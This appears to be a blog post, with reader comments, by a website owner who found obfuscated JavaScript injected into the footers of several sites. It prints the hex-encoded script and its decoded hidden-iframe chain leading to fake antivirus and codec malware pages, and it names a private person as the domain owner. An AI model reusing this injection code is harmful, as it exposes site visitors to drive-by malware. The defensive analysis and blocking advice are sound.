Recently I noticed something else than google analytics loading in the status bar when I visited some of my sites, so I thought I`ll have a closer look.
Three of my sites had hidden links added in the footer and two of them had a piece of JavaScript.
Of course, I removed the links without thinking, but I did save thescript.
Here is how the script looks:
<!-- ~ -->
<script type="text/javascript">
function oxsletpvxjt(qixfiot){
var ddrbvc="";
for(mpcrghwo=0;mpcrghwo<qixfiot.length;mpcrghwo+=2){
ddrbvc+=(String.fromCharCode(parseInt(qixfiot.substr(mpcrghwo,2),16)));
}document.write(ddrbvc);
}
oxsletpvxjt("3Cpsbmbvr6966psbmbvr72psbmbvr616D65psbmbvr20psbmbvr73psbmbvr7263psbmbvr3D22psbmbvr687474703A2F2Fpsbmbvr74756D75psbmbvr6Cpsbmbvr74psbmbvr75psbmbvr6F73psbmbvr75psbmbvr6Dpsbmbvr2Epsbmbvr63psbmbvr6F6D2F65702Fpsbmbvr696E64psbmbvr6578psbmbvr2Epsbmbvr7068psbmbvr7022psbmbvr207374796C65psbmbvr3Dpsbmbvr227669psbmbvr73psbmbvr69psbmbvr62psbmbvr696Cpsbmbvr69psbmbvr74psbmbvr79psbmbvr3A2068psbmbvr696464psbmbvr65psbmbvr6E3Bpsbmbvr206469psbmbvr73psbmbvr706C61psbmbvr79psbmbvr3A20psbmbvr6E6F6E65223E3Cpsbmbvr2Fpsbmbvr69psbmbvr66psbmbvr72psbmbvr61psbmbvr6D65psbmbvr3E".replace(/psbmbvr/g, ""));
</script><
<!-- ~ -->
Here is what the script does:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is the iframe content:
<iframe src="http://razmarin.net/a32/index.php"></iframe>
<iframe src="http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/66"></iframe>
<script language=JavaScript>
window.open("http://www.antivirxp08.com/sysscan/5060f17b673b0b9bba790dd61bb6de34/1/67", "_blank");
window.open("http://www.youpornztube.com/codec/5060f17b673b0b9bba790dd61bb6de34/14/68", "_blank");
</script>
Probably a trojan of some knind, didn`t feel like looking any further.
Interesting thing is how that code got on my websites. I`m sure my account was not hacked, if it was so, all my sites would have been messed with, so I`m guessing it was the server that got hacked. What people would do for a few extra links and traffic.
So make sure you look in the source of your websites and if you find that piece of JavaScript at the end, just remove it.
As for the surfers, I guess you should block that site so you won`t get infected with who knows what.
Easyest way to do that is to edit your hosts file.
Where to find hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC Win 98/ME = C:\WINDOWS
How hosts file contents look like:
127.0.0.1 localhost
Edit and add the unvanted site:
127.0.0.1 tumultuosum.com
How it should look now:
127.0.0.1 localhost 127.0.0.1 tumultuosum.com
So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he`s just a big fat jerk and a lousy hacker.
Wow, I can’t believe they were able to get into your server… No doubt, what some people will do…
I use a shared hosting plan from Host I Can and have not found such hacks but I hear all the time that shared hosting plans get hacked a lot because once in a hacker can access hundreds of sites and gain links or do destruction easily. Unfortunately I cannot do anything to the server to protect myself.
They did not access your server, and your site is still vulnerable. The exploit used in this attack is called XSS or cross-site scripting. XSS is a vulnerability in web applications & forms which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Often during an attack “everything looks fine” to the end-user.
I see you are using WordPress which is rife with XSS vulnerabilities, however, a lot of web applications are, it’s doesn’t mean WP is crap. Just try and update to the latest version if you haven’t and start looking for WP and XSS related info so you can fix the hole.
I came across this blog the other day and you got some great info here – thanks.
Or use the NoScript plugin for Firefox. Additionally, I’ve seen sites being hacked due to FrontPage Extensions not being removed properly. If you don’t know, Microsoft has stopped development and support for FrontPage Extensions.